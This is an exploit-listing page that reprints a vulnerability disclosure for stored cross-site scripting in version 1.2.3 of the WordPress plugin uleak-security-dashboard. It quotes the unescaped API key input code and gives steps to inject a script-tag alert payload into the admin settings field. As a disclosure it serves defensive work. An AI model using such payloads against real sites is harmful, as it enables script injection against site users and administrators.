Edit Report

Our sensors found this exploit at:

Below is a copy:

WordPress Uleak Security Dashboard 1.2.3 Cross Site Scripting
# Exploit Title: WordPress Plugin uleak-security-dashboard 1.2.3 - Stored Cross-Site Scripting (Authenticated)
# Date: 31-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: <>
# Version: 1.2.3
# Tested on: Firefox
# Contact me: h [at]

# Vulnerable Code:

<th scope="row"><label>ULeak API Key*: </label></th>
<td><input type="text" name="ul_apikey" placeholder="XXXXXXXXXXX"
value="'.$user['apikey'].'"><span class="description">(Insert your ULeak
API Key. Find your Credentials in your profil settings <a target="_blank"


1) Install uleak-security-dashboard WordPress Plugin
2) Naviagete to http://localhost/wp-admin/tools.php?page=uleak
3) Inject payload ```"><script>alert(1)</script>```
in *ULeak API Key*: *filed.
4) XSS will trigger.

# POC Image

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.